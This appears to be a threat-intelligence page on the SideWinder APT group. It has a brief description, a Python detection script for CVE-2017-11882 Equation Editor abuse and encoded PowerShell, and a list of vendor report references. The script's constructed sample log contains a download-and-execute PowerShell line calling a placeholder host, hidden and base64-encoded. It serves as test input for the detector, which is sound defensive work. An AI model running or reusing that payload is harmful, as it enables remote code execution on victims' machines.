
SideWinder

aka: RAZOR TIGER, Rattlesnake, APT-C-17, T-APT-04

An actor mainly targeting Pakistani military targets, active since at least 2012. We have low confidence that the malware is authored by an Indian company. To spread the malware, the group uses its own implementations of exploits for known vulnerabilities (such as CVE-2017-11882) and deploys a PowerShell payload in the final stages.
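The delivery chain in the description (a document exploiting CVE-2017-11882, then a PowerShell payload in the final stage) suggests a straightforward endpoint check. The script below is an added example, not code from Malpedia or from any of the referenced reports. It relies on one fact not stated on this page, namely that CVE-2017-11882 is a flaw in the Microsoft Equation Editor binary EQNEDT32.EXE, and it assumes a Sysmon-like JSON-lines event format with Image, ParentImage and CommandLine fields. The sample log is constructed for illustration.

```python
"""Process-creation heuristics for the delivery chain described above: an
Office document triggering CVE-2017-11882 in the Equation Editor (EQNEDT32.EXE),
which then launches a script host that runs a PowerShell payload.

Added example, not part of the Malpedia page. The JSON-lines event layout with
Image/ParentImage/CommandLine fields is an assumption (Sysmon-like); the log
below is constructed, not real telemetry.
"""
import base64
import json
import re
from typing import Dict, List, Optional, Tuple

# EQNEDT32.EXE is the binary exploited by CVE-2017-11882. The legitimate
# Equation Editor never needs to start shells or script interpreters.
EQUATION_EDITOR = "eqnedt32.exe"
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# PowerShell accepts unambiguous prefixes of its switches, so -e, -enc and
# -EncodedCommand are all valid; the operand is base64 of a UTF-16LE string.
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_RE = re.compile(r"-(?:w|win|window|windowstyle)\s+hidden", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode the -EncodedCommand operand, or return None if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: Dict[str, str]) -> List[str]:
    """Return findings for one process-creation event (empty list if benign)."""
    findings: List[str] = []
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")

    if parent == EQUATION_EDITOR and child in SCRIPT_HOSTS:
        findings.append(f"{EQUATION_EDITOR} spawned {child}: consistent with CVE-2017-11882 exploitation")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append(f"encoded PowerShell command: {decoded.strip()}")
    if HIDDEN_RE.search(cmdline):
        findings.append("PowerShell started with a hidden window")
    return findings


def scan(log_lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Run analyze_event over JSON-lines input; return (line index, findings) for hits."""
    hits: List[Tuple[int, List[str]]] = []
    for i, line in enumerate(log_lines):
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines rather than aborting the scan
        findings = analyze_event(event)
        if findings:
            hits.append((i, findings))
    return hits


# --- constructed sample log (not real telemetry) ---------------------------
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_LOG = [
    json.dumps({"ParentImage": r"C:\Windows\explorer.exe",
                "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                "CommandLine": "WINWORD.EXE /n invoice.docx"}),
    json.dumps({"ParentImage": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
                "Image": r"C:\Windows\System32\cmd.exe",
                "CommandLine": f"cmd /c powershell -w hidden -enc {ENCODED}"}),
    json.dumps({"ParentImage": r"C:\Windows\System32\cmd.exe",
                "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "CommandLine": f"powershell -w hidden -enc {ENCODED}"}),
    json.dumps({"ParentImage": r"C:\Windows\System32\svchost.exe",
                "Image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
                "CommandLine": r'"EQNEDT32.EXE" -Embedding'}),
]

if __name__ == "__main__":
    for idx, found in scan(SAMPLE_LOG):
        print(f"line {idx}:")
        for f in found:
            print("   ", f)
```

The parent/child check is the high-confidence signal; the encoded-command and hidden-window checks on their own are noisy in environments with heavy PowerShell automation, so they are reported as context rather than as stand-alone alerts. The last sample line shows the legitimate case, EQNEDT32.EXE started by svchost.exe through COM with -Embedding, which produces no finding.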


Associated Families

There are currently no families associated with this actor.


References
2021-03-04 - Malpedia - Malpedia
@online{malpedia:20210304:malpedia:b8ffad2, author = {Malpedia}, title = {{Malpedia Page for family Sidewinder}}, date = {2021-03-04}, organization = {Malpedia}, url = {https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder}, language = {English}, urldate = {2021-03-12} }
Tags: SideWinder

2020-12-09 - Trend Micro - Joseph C Chen, Jaromír Hořejší, Ecular Xu
@online{chen:20201209:sidewinder:a454abd, author = {Joseph C Chen and Jaromír Hořejší and Ecular Xu}, title = {{SideWinder Leverages South Asian Territorial Issues for Spear Phishing and Mobile Device Attacks}}, date = {2020-12-09}, organization = {Trend Micro}, url = {https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html}, language = {English}, urldate = {2020-12-10} }
Tags: Meterpreter, SideWinder

2020-12-09 - AlienVault OTX - AlienVault
@online{alienvault:20201209:sidewinder:65e0781, author = {AlienVault}, title = {{SideWinder APT South Asian Territorial Themed Spear Phishing and Mobile Device Attacks}}, date = {2020-12-09}, organization = {AlienVault OTX}, url = {https://otx.alienvault.com/pulse/5fd10760f9afb730d37c4742/}, language = {English}, urldate = {2021-03-12} }
Tags: SideWinder

2020-01-06 - Trend Micro - Ecular Xu, Joseph C Chen
@online{xu:20200106:first:bb9628c, author = {Ecular Xu and Joseph C Chen}, title = {{First Active Attack Exploiting CVE-2019-2215 Found on Google Play, Linked to SideWinder APT Group}}, date = {2020-01-06}, organization = {Trend Micro}, url = {https://blog.trendmicro.com/trendlabs-security-intelligence/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group/}, language = {English}, urldate = {2020-01-13} }
Tags: SideWinder

2019-02-26 - Tencent - Tencent Yujian Threat Intelligence Center
@online{center:20190226:disclosure:d46aaed, author = {Tencent Yujian Threat Intelligence Center}, title = {{Disclosure of SideWinder APT's attack against South Asia}}, date = {2019-02-26}, organization = {Tencent}, url = {https://s.tencent.com/research/report/659.html}, language = {Chinese}, urldate = {2021-03-04} }
Tags: SideWinder

2018-07-16 - Medium Sebdraven - Sébastien Larinier
@online{larinier:20180716:sidewinder:cb05fe4, author = {Sébastien Larinier}, title = {{APT Sidewinder: Tricks powershell, Anti Forensics and execution side loading}}, date = {2018-07-16}, organization = {Medium Sebdraven}, url = {https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c}, language = {English}, urldate = {2020-01-13} }
Tags: SideWinder

2018-05-23 - Tencent - Tencent Mimi Threat Intelligence Center
@online{center:20180523:sidewinderapttapt04:2f4c2cc, author = {Tencent Mimi Threat Intelligence Center}, title = {{SideWinder“响尾蛇”APT组织(T-APT-04):针对南亚的定向攻击威胁}}, date = {2018-05-23}, organization = {Tencent}, url = {https://s.tencent.com/research/report/479.html}, language = {Chinese}, urldate = {2020-01-06} }
Title (translated from Chinese): SideWinder ("Rattlesnake") APT group (T-APT-04): targeted attack threat against South Asia
Tags: SideWinder

2018-04-12 - Kaspersky Labs - GReAT
@online{great:20180412:trends:babf7f6, author = {GReAT}, title = {{APT Trends report Q1 2018}}, date = {2018-04-12}, organization = {Kaspersky Labs}, url = {https://securelist.com/apt-trends-report-q1-2018/85280/}, language = {English}, urldate = {2020-01-08} }
Tags: SideWinder

2014-08-08 - FireEye - FireEye
@techreport{fireeye:20140808:sidewinder:ddc16cd, author = {FireEye}, title = {{Sidewinder Targeted Attack Against Android in the Golden Age of AD Libraries}}, date = {2014-08-08}, institution = {FireEye}, url = {https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/fireeye-sidewinder-targeted-attack.pdf}, language = {English}, urldate = {2021-03-04} }
Tags: SideWinder

Credits: MISP Project